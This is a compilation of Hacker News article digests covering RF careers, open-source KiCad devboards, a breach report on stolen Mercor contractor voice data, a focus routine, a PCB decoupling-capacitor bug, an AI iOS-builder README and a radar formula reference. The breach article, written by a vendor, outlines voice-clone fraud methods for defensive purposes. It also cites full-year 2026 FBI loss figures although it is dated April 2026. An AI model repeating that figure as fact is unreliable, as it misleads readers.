The real signal to me is what companies are doing about it. [Mini-Circuits](https://blog.minicircuits.com/bridging-the-gap-between-the-university-and-the-rf-industry/) and Keysight are investing directly in university partnerships because they can't wait for the academic pipeline to refresh itself. Baylor launched a new Graduate Certificate in Microwave/RF Engineering in 2024, one of the few new programs I've seen pop up, but I imagine it won't be the last. When industry starts building its own talent pipeline, that tells me the shortage isn't a blip.

## Looking Forward

I don't want to oversell this. I don't think RF is going to become a field with an insane growth pattern. [The BLS](https://www.bls.gov/ooh/architecture-and-engineering/electrical-and-electronics-engineers.htm) projects 7% growth for EE broadly, faster than average sure, but not a hockey stick. The demand is real, it's coming from multiple directions at once, and the supply is genuinely constrained.

My own path is a small version of this story. I came in as a software engineer and had to learn RF on the job because there wasn't someone else to hand it off to. I say this as someone who made that transition, you *absolutely* can learn enough RF to be effective in your role, and I'd encourage anyone in aerospace or wireless to do it (honestly it's a fun niche to get into anyway). But there's a difference between understanding link budgets and SDR anomalies versus designing a phased array from scratch. The latter takes years of dedicated focus. The underlying physics (electromagnetics, thermodynamics, materials science, manufacturing tolerances) don't reduce to algorithms. You have to build intuition for it, and that's not something you can shortcut.

I may one day expand on learning this stuff on the job and on the fly, but I do want to shoutout [PySDR](https://pysdr.org/). It's a free resource built exactly for software engineers. It uses Python as the bridge between hardware and software concepts, and starts with no RF knowledge assumptions from the beginning and doesn't spend a ton of time over explaining the math.

The people who stuck with RF through the lean years are now some of the most sought-after engineers I've come across. And for anyone trying to figure out where to focus, either as a primary discipline or as a secondary skill set like it was for me, I think RF is worth a serious look right now.

* * *

**Who Am I?**

Anthony Templeton is a software engineer passionate about high-performance computing and aerospace applications. You can connect with me on [LinkedIn](https://www.linkedin.com/in/anthony-f-templeton/) or check out more of my work on [GitHub](https://github.com/ATTron).

---

## [HN-TITLE] 10. Easyduino: Open Source PCB Devboards for KiCad

- **Source**: [https://github.com/Hanqaqa/Easyduino](https://github.com/Hanqaqa/Easyduino)
- **Site**: GitHub
- **Submitter**: Hanqaqa (Hacker News)
- **Submitted**: 2026-04-27 17:45 UTC (Hacker News)
- **HN activity**: 179 points · [27 comments](https://news.ycombinator.com/item?id=47924813)
- **Length**: 789 words (~4 min read)
- **Language**: en

## Easyduino: Repository of Open Source PCB Devboards for KiCad

[](#easyduino-repository-of-open-source-pcb-devboards-for-kicad)

The Easyduino project is an effort to easily dive into different PCB designs of the most popular microcontroller devboards like **Arduino, ESP32, Raspberry Pico and STM32 Bluepill** (more to come!). Using the free and Open Source Software [KiCad](https://www.kicad.org/) and adhering the best practices across the PCB and KiCad ecosystem. Also adding the much needed USB-C support!

[![](https://github.com/Hanqaqa/Easyduino/raw/master/Assets/Isometric%20Photos/Collage_easyduino.jpg)](https://github.com/Hanqaqa/Easyduino/blob/master/Assets/Isometric%20Photos/Collage_easyduino.jpg)

The project was born out of the necessity to unify the wide variety of software, languages and conventions used in the most popular devboards. For example Arduino Uno was developed in 2010, Italy, using Eagle. The ESP32 devboard was developed in 2016, China, using Altium. The Raspberry Pi Pico 2040 was developed around 2021 in the U.K. using KiCad and Altium...

## Available Development Boards

[](#available-development-boards)

[Easyduino UNO](https://github.com/Hanqaqa/Easyduino/tree/master/Atmega328p%20Arduino%20Uno) [Easyduino Nano](https://github.com/Hanqaqa/Easyduino/tree/master/Atmega328p%20Arduino%20Nano) [Easyduino ESP32](https://github.com/Hanqaqa/Easyduino/tree/master/ESP32) [![](https://github.com/Hanqaqa/Easyduino/raw/master/Assets/Miniatures/UNO.jpg)](https://github.com/Hanqaqa/Easyduino/tree/master/Atmega328p%20Arduino%20Uno) [![](https://github.com/Hanqaqa/Easyduino/raw/master/Assets/Miniatures/Nano.jpg)](https://github.com/Hanqaqa/Easyduino/tree/master/Atmega328p%20Arduino%20Nano) [![](https://github.com/Hanqaqa/Easyduino/raw/master/Assets/Miniatures/ESP32.jpg)](https://github.com/Hanqaqa/Easyduino/tree/master/ESP32)

[Easyduino ESP32 S3](https://github.com/Hanqaqa/Easyduino/tree/master/ESP32S3) [Easyduino Pi Pico](https://github.com/Hanqaqa/Easyduino/tree/master/Raspberry%20Pi%20Pico%202040) [Easyduino Bluepill STM32F103](https://github.com/Hanqaqa/Easyduino/tree/master/STM32F103%20Bluepill) [![](https://github.com/Hanqaqa/Easyduino/raw/master/Assets/Miniatures/ESP32S3.jpg)](https://github.com/Hanqaqa/Easyduino/tree/master/ESP32S3) [![](https://github.com/Hanqaqa/Easyduino/raw/master/Assets/Miniatures/Raspberry.jpg)](https://github.com/Hanqaqa/Easyduino/tree/master/Raspberry%20Pi%20Pico%202040) [![](https://github.com/Hanqaqa/Easyduino/raw/master/Assets/Miniatures/STM32F103.jpg)](https://github.com/Hanqaqa/Easyduino/tree/master/STM32F103%20Bluepill)

The outline, pinout, layout and components have been tried to be replicated with respect to the originals, in all of the boards. With various levels of success.

Some boards, like the Raspberry Pi Pico use 01005 components which are too expensive for the manufacturer to integrate in the PCB Aseembly line. Some other components like the original Arduino UNO USB to Serial converter, an Atmega16u2, were hard to come by during the development of this project ~January 2023, so more readily available options were chosen. All the differences with the original boards are explained inside the folder of each project in a readme file.

4 layers of copper have been used in all projects to simplify the wiring. Specifically the [JLC04161H-7628](https://jlcpcb.com/impedance) stackup.

The PCB constraints of the manufacturer JLCPCB are explained [here](https://github.com/Hanqaqa/Easyduino/tree/master/Assets/JLCPCB%20Constraints)

## Structure of each project

[](#structure-of-each-project)

Each project consists of:

- Main KiCad files (.kicad\_pro, .kicad\_sch...)
- A readme explaining the specifics of that project
- xxx.pretty or xxxlibraries folder which contains the non standard footprints or schematic parts used in the project (Some projects such as the Arduino UNO only use standard libraries, therefore these folders don't exist)
- The **Outputs** folder: All the data produced by the KiCad Jobset like Gerbers, STEPs, PDFs, ERC, BOM, CPLs...
- The ***ProductionFiles*** folder which includes files such as:
  
  - BOM: This folder contains both the list of components and the Centroid File in JLCPB readable format
  - ***Datasheets***: all the datasheets of the main components used in the project. Datasheets of easily replaceable components such as Resistors, Capacitors and LEDs are not given
  - Gerbers: A zip file with all of the manufacturing gerber files such as Copper/Mask/Silkscreen layers
  - PDFs: PDF and PNG files of the Schematic and PCB
  - Photos: Some photos of the manufactured PCB as well as some renders

## Using the project

[](#using-the-project)

1. Install the latest version of [KiCad](https://www.kicad.org/)
2. If you already have KiCad installed, click the upper right button in this github page `<>Code`, click `Download ZIP`, extract the files in your desired folder. If you know how to use git, clone the repository
3. Double click on the xxx.kicad\_pro file inside any project and KiCad will start

This project was developed using KiCad v8.0.0, but has been updated and tested with KiCad v10. Including the creation of Jobsets which massively simplfies creating gerbers and BOMs.

Since this is a collection of projects, the new KiCad v10 Git utilities don't work properly with each project, forcing you to git add the whole project if you want to make a change.

If you'd rather just consult the schematics or the gerbers. They are located inside the **ProductionFiles** folder of each project. Inside the **PDFs** and **Gerber** folders.

## Contributing

[](#contributing)

If you spot any mistakes inside any of the projects. Either open an issue and I will try to correct it or fork and merge the correction.

If you plan on developing any other development boards and wish to merge into the project. Please try to use the same style and conventions as the original ones in the schematic. Positive voltages facing up, text being clearly readable, a references page, similar folder structure.

To do list:

- Order and test the v1.1 RP2040 board. (In v1.0 I mixed some pins in the Flash and couldn't boot up). Ordered. Awaiting arrival.
- Order and test the v1.1 ESP32S3 board. (In v1.0 I forgot to add PullUp and PullDown in RST and SUSPEND CP2102). Ordered. Awaiting arrival.
- Start developing a nRF52840 Dongle and RP2350A.
- Investigate other possible microcontrollers/SOCs to implement.

## Acknowledgments

[](#acknowledgments)

Thanks to [winsrrow](https://github.com/winsrrow) for providing KiCad tips and designing from the ground up the v1.1 RP2040 board.

## Licensing

[](#licensing)

This project is distributed under the [**CERN Open Hardware Licence Version 2 - Permissive**](https://github.com/Hanqaqa/Easyduino/blob/master/License.txt) which means **you are free to use any or all parts of this project with or without disclosing the source**, even for comercial projects. As long as you include a copy of the CERN OHLv2 Permissive Licence.

---

## [HN-TITLE] 11. 4TB of voice samples just stolen from 40k AI contractors at Mercor

- **Source**: [https://app.oravys.com/blog/mercor-breach-2026](https://app.oravys.com/blog/mercor-breach-2026)
- **Site**: ORAVYS
- **Author**: ORAVYS
- **Submitted**: 2026-04-27 09:57 UTC (Hacker News)
- **HN activity**: 456 points · [168 comments](https://news.ycombinator.com/item?id=47919630)
- **Length**: 1.3K words (~6 min read)
- **Language**: en

[← ORAVYS](https://app.oravys.com/site)

Forensic intelligence // Breach analysis

## 4TB of voice samples were just stolen from 40,000 AI contractors. Here is how to verify if yours is being weaponized.

By the ORAVYS forensic desk Published April 24, 2026 ~7 min read

On April 4, 2026, the extortion group Lapsus$ posted Mercor on its leak site. The dump is reported at roughly four terabytes and bundles a payload that breach analysts have been warning about for two years: voice biometrics paired with the same person's government-issued identity document. According to the leaked sample index, the archive covers more than 40,000 contractors who signed up to label data, record reading passages, and run through verification calls for AI training.

Five contractor lawsuits were filed within ten days of the post. The plaintiffs argue that the company collected voice prints under a "training data" framing without making clear they were also a permanent biometric identifier. The lawsuits matter, but the people whose voices were already exfiltrated have a more immediate question. What does an attacker actually do with thirty seconds of someone's clean read voice plus a scan of their driver's license?

## Why this breach is different

Most voice leaks in the last decade fell into one of two buckets. Either a call center got popped and recordings were stolen with no easy way to map them back to identity. Or an ID-document broker leaked driver's licenses and selfies without any audio attached. Mercor merged both columns. The contractor onboarding pipeline asked for a passport or driver's license scan, then a webcam selfie, then a sit-down voice recording reading scripted prompts in a quiet room. That sequence, in one row of one database, is exactly what a synthetic voice cloning service needs as input.

The Wall Street Journal reported in February 2026 that high-quality voice cloning now requires roughly fifteen seconds of clean reference audio for tools available off the shelf. The Mercor recordings are reported to average two to five minutes of studio-clean speech per contractor. That is far past the threshold. Pair it with a verified ID document and the attacker has both the clone and the credential needed to put the clone to work.

## What attackers can now do with stolen voice data

The threat models below are not speculative. Each is a documented technique already used in the wild before this breach.

- **Bank verification bypass.** Several US and UK banks still treat voiceprint matching as one of two factors. A clone of the account holder reading a challenge phrase clears the audio gate, leaving only a knowledge question that often comes from the same leaked dataset.
- **Vishing the victim's employer.** Calling HR or finance pretending to be the employee to redirect payroll, request a wire, or unlock a workstation. The Krebs on Security archive lists more than two dozen confirmed cases since 2023.
- **Deepfake video calls in the Hong Kong Arup template.** In 2024 a finance worker at Arup wired roughly 25 million dollars after a multi-person deepfake video call. The voices and faces had been built from public footage. Mercor leaked something better than public footage: studio audio plus a verified ID.
- **Insurance claim fraud.** Pindrop reported a 475 percent year-over-year increase in synthetic voice attacks against insurance call centers across 2025. Auto, life, and disability claims are the prime targets because they are settled by phone.
- **Romance and grandparent scams targeting family members.** The FBI Internet Crime Complaint Center logged 2.3 billion dollars in losses for victims aged 60 and over in calendar year 2026. The single fastest-growing category was emergency impersonation calls, where the synthetic voice claims to be a relative in trouble.

## How to check if your voice is being misused

If you ever uploaded a voice sample to Mercor, or to any of the other AI training brokers that operated through 2025, treat your voice the way you would treat a leaked password. You cannot rotate it, but you can change what it unlocks. Here is the short list.

1. **Self-audit your public audio footprint.** Search YouTube, podcast directories, and old Zoom recordings for samples of your voice that are publicly indexable. Take down what you can. The less reference audio is in the open, the less robust an attacker's clone.
2. **Set up a verbal codeword with family and finance contacts.** Pick a phrase that has never been spoken on a recording and never typed in chat. Brief the people who handle money on your behalf. If a call ever asks for a transfer, the codeword is mandatory.
3. **Rotate where voiceprints are still in use.** Google Voice Match, Amazon Alexa Voice ID, Apple personal voice, and any banking voiceprint enrollment can be deleted and replaced. Do that now, ideally from a new recording in a different acoustic environment than the leaked sample.
4. **Tell your bank to disable voiceprint as a verification factor.** Ask in writing for multi-factor authentication that combines an app token or hardware key with a knowledge factor. Many banks let you opt out of voice as a primary factor; few of them advertise it.
5. **Run suspicious recordings through a forensic scanner.** If you receive an audio file or voicemail that claims to be from someone you know and asks for money, access, or urgency, run it through a deepfake detector before acting. ORAVYS offers a free check for the first three samples submitted by breach victims (see the offer below).

## The forensic checklist that experts use

When a sample lands on a forensic analyst's desk, the following artifacts are the first pass. Each is something a synthetic voice tends to get slightly wrong, even when the perceptual quality is high.

- **Codec mismatch.** The audio claims to come from a phone call but the spectral signature does not match any known telephony codec.
- **Breath patterns.** Real speakers inhale at predictable points dictated by phrase length and lung capacity. Synthetic voices often skip breaths or insert them at the wrong syllabic boundary.
- **Micro-jitter.** Natural vocal folds vibrate with small irregularities. Generated audio is often too clean at the millisecond level.
- **Formant trajectory.** Vowel transitions follow physical articulator paths in a real mouth. Cloned voices sometimes take impossible shortcuts between formants.
- **Room acoustics inconsistency.** The reverb signature should be identical from the start of the file to the end. Generated audio is often dry while the splice context is reverberant.
- **Prosody flatness.** Synthetic speech often has narrower pitch and energy variance than the same speaker would have in real conditions.
- **Speech rate stability.** Real humans speed up and slow down with content. Generated speech tends to hold a metronomic rate across long passages.

## What ORAVYS does specifically

- More than 3,000 forensic engines run in parallel on every submitted sample, covering signal, prosody, articulation, codec, and provenance domains.
- AudioSeal watermark detection flags files generated by major commercial voice models when the watermark is preserved, giving a deterministic positive when present.
- An anti-spoofing module trained against the ASVspoof public benchmarks scores the likelihood that a sample was synthesized rather than recorded.
- Biometric processing is RGPD compliant. Audio is never used to train commercial models without explicit consent and is purged on a defined retention schedule.

### Free verification for Mercor breach victims

If you were a Mercor contractor and you believe your voice may already be in circulation, ORAVYS will analyze the first three suspect samples free of charge. You will receive a forensic report covering watermark detection, anti-spoofing score, and the artifact checklist above. No card required, no quota gate.

[Run a forensic check →](https://app.oravys.com/deepfake-detection)

Sources cited in this article: Lapsus$ leak site index (April 2026), Wall Street Journal voice cloning report (February 2026), Pindrop Voice Intelligence Report 2025, FBI IC3 Elder Fraud Report 2026, Krebs on Security archives. Lawsuit references are matters of public record. ORAVYS does not host or redistribute the leaked dataset and does not accept it as input.

---

## [HN-TITLE] 12. Men who stare at walls

- **Source**: [https://www.alexselimov.com/posts/men\_who\_stare\_at\_walls/](https://www.alexselimov.com/posts/men_who_stare_at_walls/)
- **Site**: Alex Selimov
- **Author**: 2026-04-27
- **Published**: 2026-04-27
- **HN activity**: 465 points · [209 comments](https://news.ycombinator.com/item?id=47920074)
- **Length**: 584 words (~3 min read)
- **Language**: en-US

![Edited image from Men Who Stare At Goats with George Clooney staring at wall instead of a goat](https://www.alexselimov.com/posts/men_who_stare_at_walls/cover.webp)

I came across [a video by Simple Lucas](https://www.youtube.com/watch?v=NZD5IFpyDcE&pp=ygUgc3RhcmluZyBhdCB3YWxsIGZvciBwcm9kdWN0aXZpdHk%3D) describing a routine to improve focus and productivity. The routine was basically:

1. Don’t use any screens/entertainment when trying to focus on work.
2. When you start to feel mentally drained, sit and stare at a wall for x minutes to recover focus.

I’ve been trying it, and it’s a very effective (but hard) routine.

## The problem

The core problem is that most people by default are in an information overload. A paper published in 2012 showed that in 2008 the average person was receiving 34 GB of information daily, with a daily information exposure growth rate of about 5.4% per year [1](#fn:1). Extrapolating that trend, we would be at about 87 GB worth of data today. This calculation includes audio, visual, and text data and incorporates quality into the measurement, i.e. 10 minutes of HD video has more information than 10 minutes of 480p video. It’s unclear to me exactly how the quality impacts things, but regardless it is obvious that we are all being drowned in a sea of information.

I certainly go through periods of “brain fog” and lack of focus/motivation. These periods usually go something like:

1. Get a bad night of sleep (up late for an event, kids keep waking me up).
2. Wake up very tired so consume large amounts of caffeine.
3. Have trouble focusing after 2/3 cups so use media while working to dull the pain (music/podcasts) or take more “breaks” (reading hackernews).
4. Stay up late because I’m wired on caffeine and dopamine from scrolling.
5. Go back to 2.

I find these cycles very hard to break out of when I’m in them. The media consumption constitutes a small dopamine hit. Large numbers of small hits puts you in a hole, where you need even more/stronger hits to feel good.

## Disconnecting

The obvious solution is to disconnect from scrolling, but that doesn’t overcome the biggest issue. When I’m in this “brain fog” cycle (and sometimes outside of it), I will find that around 1/2 pm I hit a wall. My head will start hurting, my motivation will be trash, and my productivity significantly degrades. My first instinct is to go for more coffee. That usually lets me keep working, but at a slow/painful pace. While looking for focusing strategies I came across the life-changing solution…

## Stare at a Wall!

After watching Simple Lucas’ experience, I decided to try it when I hit my focus wall.

It worked.

In my attempts, I combined wall staring with a few other concepts I had heard about. First was activating the parasympathetic nervous system by staring at the wall “out-of-focus” and using peripheral vision. Second was incorporating mind blanking which means trying to think of nothing. I tried intervals of 5-10 minutes and when I was done, my focus was back!

What I didn’t expect was how difficult it would be. Sitting for 5-10 minutes staring at a wall without thinking of anything is hard! I relate it somewhat to the feeling I have with working out. Often times I want to avoid it because it’s hard, but I’m always happy when I push through and complete it. It was the exact same experience with the wall staring.

So far I’ve been feeling significant focus/productivity improvements. I’ve also been using some other strategies to improve focus, which I’ll be talking about in a future post. I plan to continue this routine and will update to see how much it has impacted productivity/focus. Thanks for reading!

* * *

1. [https://ijoc.org/index.php/ijoc/article/view/1566](https://ijoc.org/index.php/ijoc/article/view/1566) [↩︎](#fnref:1)

---

## [HN-TITLE] 13. How I leared what a decoupling capacitor is for, the hard way

- **Source**: [https://nbelakovski.substack.com/p/how-i-learned-what-a-decoupling-capacitor](https://nbelakovski.substack.com/p/how-i-learned-what-a-decoupling-capacitor)
- **Site**: Nickolai’s Substack
- **Author**: Nickolai Belakovski
- **Published**: 2026-04-25
- **HN activity**: 36 points · [6 comments](https://news.ycombinator.com/item?id=47905208)
- **Length**: 906 words (~4 min read)
- **Language**: en

I was very excited to get the latest version of my PCB from the manufacturer. This new version had a magnetometer on it, so that I could more accurately track the yaw angle of my drone.

[![](https://substackcdn.com/image/fetch/$s_!qV1Y!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0e0ee63c-0221-4885-b215-d8c2405b9c9a_3008x2329.jpeg)](https://substackcdn.com/image/fetch/$s_!qV1Y!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0e0ee63c-0221-4885-b215-d8c2405b9c9a_3008x2329.jpeg)

The first thing I did was start to program it over USB. I added code for initializing and reading the magnetometer, and I got back some data that seemed correct for the X and Y axes, but the Z axis would read a constant value. I did some light debugging, and learned, among other things, that the Z axis has slightly different internal circuity, but eventually I decided to put a pin in it and focus on other things.

Eventually I had to plug my drone into the battery that would power it in flight, and all of a sudden the magnetometer stopped working completely. I pivoted back to it in an effort to debug it, but nothing worked. I tried to reset the board, I tried to add the code to automatically reset and reinitialize the magnetometer if I hadn’t heard from it for a while, but no matter what I tried it would stay dead when the battery was plugged in.

When I would unplug the battery and plug the USB back in, the magnetometer would recover and work just like it had before. So right away I have to start thinking about what the 3.3V line which powers the magnetometer looks like under USB vs battery.

[![](https://substackcdn.com/image/fetch/$s_!dzaA!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1fdad08c-fca6-4c68-92fd-93b50f74bfe3_3008x1955.jpeg)](https://substackcdn.com/image/fetch/$s_!dzaA!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1fdad08c-fca6-4c68-92fd-93b50f74bfe3_3008x1955.jpeg)

A Qwiic connector gives me easy access to the 3.3V bus. Here you can see it’s reading a pretty steady 3.3V

[![](https://substackcdn.com/image/fetch/$s_!EhRI!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F39ac8edd-23ea-4a97-a538-ce1ba0e68810_3008x2208.jpeg)](https://substackcdn.com/image/fetch/$s_!EhRI!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F39ac8edd-23ea-4a97-a538-ce1ba0e68810_3008x2208.jpeg)

Under battery it similarly reads about 3.3V, and the reading on the multimeter is steady

So does that mean it’s not an issue with the 3.3V bus? Well, not exactly. The multimeter is going to give you a bulk reading, but it’s possible that the line is noisy even though the average reading is 3.3V. The way we get to 3.3V from the initial 5V/8V is through a [SY8113IADC](https://atta.szlcsc.com/upload/public/pdf/source/20200117/C479075_749CE19A0276D274B25CFED6D9E6F64F.pdf) voltage regulator. This is a modern switching regulator which is very efficient, but it achieves that efficiency by, you guessed it, rapidly switching the input supply on and off to effectively drop it down to the desired voltage (as opposed to the older kind of regulator which would just dissipate the energy as heat).

This switching causes ripples in the voltage line, and if we hook up an oscilloscope to the line we should be able to see these ripples in detail.

[![](https://substackcdn.com/image/fetch/$s_!uEBh!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb029c2d9-e430-4b53-bec1-8286cb22ddc8_3008x2105.jpeg)](https://substackcdn.com/image/fetch/$s_!uEBh!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb029c2d9-e430-4b53-bec1-8286cb22ddc8_3008x2105.jpeg)

This means the 3.3V line ranges from 3.14V to 3.7V. The BMM150 magnetometer is rated for up to 3.6V.

[![](https://substackcdn.com/image/fetch/$s_!4RXf!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb278eab3-c943-46b8-b180-7b3b0d4752d4_3008x2171.jpeg)](https://substackcdn.com/image/fetch/$s_!4RXf!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb278eab3-c943-46b8-b180-7b3b0d4752d4_3008x2171.jpeg)

This means the 3.3V line ranges from 2.74V to 4.34V! This must be why the magnetometer simply won’t work on battery power

To get this magnetometer to work on this board, there’s sadly nothing I can really do. At best I could try to solder some tiny wires to the vias on the board near the magnetometer and use those to attach a capacitor between 3.3V and GND as close to the magnetometer as possible but a) it’s likely I’d cause some damage in trying to accomplish this and b) it seems like it would be a very fragile solution.

Fortunately since I had a Qwiic connector on the board, I was able to purchase a magnetometer with a Qwiic interface and attach it. I lose out a little bit since the BMM150 on the board directly interfaces with the BMI270 IMU and synchronizes its readings with the gyroscope/accelerometer readings, but this isn’t critical for what I’m trying to do.

So we can’t exactly fix this, but we can take this as an opportunity to see how a decoupling capacitor cleans up a noisy power signal. The general idea with a decoupling capacitor is that it absorbs high frequency noise in the power line. Take another look at the pictures of the ripples above and notice the “M: 20ns” in the top left corner. This signifies that each vertical dotted line is 20ns apart, so the ripple you see has a frequency of something like 50MHz. This is the sort of noise that a small capacitor right next to the voltage and ground pins of an IC like the BMM150 is supposed to handle, if you put one into your design of course 😅.

I think the most instructive thing is to see in real time how a signal gets cleaned up when you add a decoupling capacitor.

##### For this test I went back to an older version of the PCB. Here it’s powered by 5V USB.

##### And here the board is powered by the 8V battery.

I guess I can’t be sure that the lack of a decoupling capacitor is what kills the BMM150 when I go to battery power. After reviewing my schematic, I noticed I don’t have a decoupling cap for the BMI270, and that seems to work fine, despite also being rated up to 3.6V. That said it’s very clear from this experience that it’s good practice to add decoupling capacitors to all ICs on a board. One of the main reasons I’ve undertaken this project is to learn more about the world of PCBs and embedded engineering and so even though this was frustrating in the moment, it’s exactly the kind of mistake I was hoping to run into. I’ve definitely learned something from this experience and I hope you have as well!

No posts

---

## [HN-TITLE] 14. Show HN: AgentSwift – Open-source iOS builder agent

- **Source**: [https://github.com/hpennington/agentswift](https://github.com/hpennington/agentswift)
- **Site**: GitHub
- **Submitter**: hpen (Hacker News)
- **Submitted**: 2026-04-28 01:14 UTC (Hacker News)
- **HN activity**: 13 points · [4 comments](https://news.ycombinator.com/item?id=47929375)
- **Length**: 357 words (~2 min read)
- **Language**: en

[Download AgentSwift-0.1.zip](https://github.com/hpennington/agentswift/raw/refs/heads/main/AgentSwift-0.1.zip) You must install the dependencies listed below in order for the binary to work. See below for setup commands.

Dependencies:

- Xcode
- Xcode command line tools
- xcodebuildmcp
- openspec

[![AgentSwift settings panel](https://github.com/hpennington/agentswift/raw/main/screenshot2.png)](https://github.com/hpennington/agentswift/blob/main/screenshot2.png)

[![AgentSwift](https://github.com/hpennington/agentswift/raw/main/screenshot.png)](https://github.com/hpennington/agentswift/blob/main/screenshot.png)

A native macOS app that runs an autonomous AI coding agent for Apple platform development. Describe what you want to build, and AgentSwift uses Claude to discover your project, implement changes, build, run, and validate — without you touching Xcode.

## What it does

[](#what-it-does)

AgentSwift drives a multi-phase agentic workflow:

1. **Discover** — Claude inspects your Xcode project structure and schemes
2. **Implement** — edits source files to match your request
3. **Build** — runs xcodebuildmcp to compile
4. **Launch / Validate** — boots the app on a simulator or macOS, runs UI automation to verify behavior
5. **Archive** — marks the task complete

## Requirements

[](#requirements)

- macOS 26.1+
- Xcode
- Node.js / npm
- An [Anthropic API key](https://console.anthropic.com)

## Dependencies

[](#dependencies)

Install these two CLIs before running the agent:

### xcodebuildmcp

[](#xcodebuildmcp)

Provides build, launch, and UI automation capabilities for Xcode projects.

```
npm install -g xcodebuildmcp
```

### openspec

[](#openspec)

Tracks implementation specs across agent sessions.

```
npm install -g @fission-ai/openspec
```

## Setup

[](#setup)

1. Build and run the app in Xcode.
2. Open **Settings** and enter your Anthropic API key.
3. Select a **Project Folder** (the root of your Xcode project).
4. Optionally pick an **iOS Simulator** from the dropdown.
5. Type what you want to build and press **Cmd+Return**.

On the first run the agent discovers your project's scheme and simulator target. Subsequent runs skip discovery and go straight to implementation.

## Models

[](#models)

Model Use when Claude Opus 4.7 Complex tasks, large codebases Claude Sonnet 4.6 Faster iteration, lighter tasks

## Key behaviors

[](#key-behaviors)

- **Message queuing** — if you send a new message while the agent is running, the latest supersedes earlier ones
- **Build caching** — scheme, project path, and simulator ID are extracted after the first build and reused automatically
- **Error escalation** — the agent attempts one fix on a failure, then surfaces the error to you rather than looping

## Architecture

[](#architecture)

```
AgentSwiftApp.swift    — app entry point
ContentView.swift      — UI, view models, agentic loop
AnthropicService.swift — Anthropic API client (streaming SSE)
ToolExecutor.swift     — bash / read_file / write_file execution
Item.swift             — chat message model
```

No external Swift dependencies — pure SwiftUI + Foundation.

---

## [HN-TITLE] 15. Radar Laboratory – Interactive Radar Phenomenology

- **Source**: [https://radarlaboratory.com/](https://radarlaboratory.com/)
- **Site**: radarlaboratory.com
- **Author**: Created and maintained by Hunter Bowden.
- **Submitted**: 2026-04-25 14:24 UTC (Hacker News)
- **HN activity**: 36 points · [0 comments](https://news.ycombinator.com/item?id=47901776)
- **Length**: 6.6K words (~29 min read)
- **Language**: en

RADAR LABORATORY QUICK REF · λ=c/f · R=cτ\_d/2 · ΔR=cτ/2 · f\_d=2v\_r/λ · v\_u=PRF·λ/4 · θ=0.886λ/D

THEORY REFERENCE

ALL KEY RADAR FORMULAS — ORGANIZED BY TOPIC — WITH DERIVATIONS AND CONTEXT

01 — Propagation & Frequency

Fundamental Wavelength Relation

The wavelength λ of an electromagnetic wave is inversely proportional to frequency. Every radar formula contains λ — choosing the operating frequency is the first and most consequential design decision.

λ = c / f c = 3×10⁸ m/s (speed of light) f = carrier frequency (Hz)

λ — wavelength (m) · f — frequency (Hz) · c — 3×10⁸ m/s

PROPAGATIONFUNDAMENTAL

Radar Band Designations

IEEE letter-band designations define standard operating ranges. Band choice determines resolution, attenuation, target interaction, and hardware constraints.

L-band: 1–2 GHz λ ≈ 15–30 cm S-band: 2–4 GHz λ ≈ 7.5–15 cm C-band: 4–8 GHz λ ≈ 3.75–7.5 cm X-band: 8–12 GHz λ ≈ 2.5–3.75 cm Ku-band: 12–18 GHz λ ≈ 1.7–2.5 cm Ka-band: 26–40 GHz λ ≈ 0.75–1.15 cm

BANDSPROPAGATION

Atmospheric Absorption

Water vapor (H₂O) peaks at 22 GHz (~0.18 dB/km) and 183 GHz. Oxygen (O₂) dominates at 60 GHz (~15 dB/km) and 119 GHz. Atmospheric windows at 35, 77, and 94 GHz are exploited by automotive and military radars.

L\_atm (dB) = α(f) × R\_km Two-way loss = 2 × α × R\_km α: dB/km (frequency-dependent)

α — specific attenuation (dB/km) · R\_km — one-way range (km)

PROPAGATIONLOSSES

02 — Range Measurement

Range from Echo Delay

Radar times the two-way travel of a pulse. The round-trip delay τ\_d gives range exactly. Electromagnetic waves travel at c = 3×10⁸ m/s ≈ 150 m/μs (one-way).

R = c · τ\_d / 2 1 μs delay → R = 150 m

τ\_d — round-trip delay (s) · c — 3×10⁸ m/s

RANGEFUNDAMENTAL

Maximum Unambiguous Range

The radar must receive the previous pulse's echo before firing again. If the PRI is too short, a distant echo arrives after the next transmission and is reported at a false closer range.

R\_u = c / (2 · PRF) PRI = 1 / PRF (pulse repetition interval) R\_app = R\_true mod R\_u (folded range)

PRF — pulse repetition frequency (Hz) · PRI — 1/PRF (s)

RANGEAMBIGUITY

03 — Range Resolution & Pulse Compression

Pulse Width Resolution

Two targets closer than ΔR cannot be separated — their echoes overlap in the receiver. The matched filter output width equals cτ/2, which is why resolution and pulse duration are the same formula.

ΔR = c · τ / 2 τ = 1 μs → ΔR = 150 m τ = 10 ns → ΔR = 1.5 m

τ — pulse width (s) · ΔR — minimum resolvable separation (m)

RESOLUTION

Pulse Compression (LFM Chirp)

A chirp sweeps frequency across bandwidth B during pulse duration T. The matched filter compresses the pulse to width 1/B, independent of T. This breaks the energy–resolution trade-off.

ΔR\_compressed = c / (2B) Compression gain: G\_c = B·T Peak sidelobes: −13.2 dB (rect window) −42.7 dB (Hamming window)

B — chirp bandwidth (Hz) · T — pulse duration (s)

PULSE COMPRESSIONLFM

Matched Filter SNR

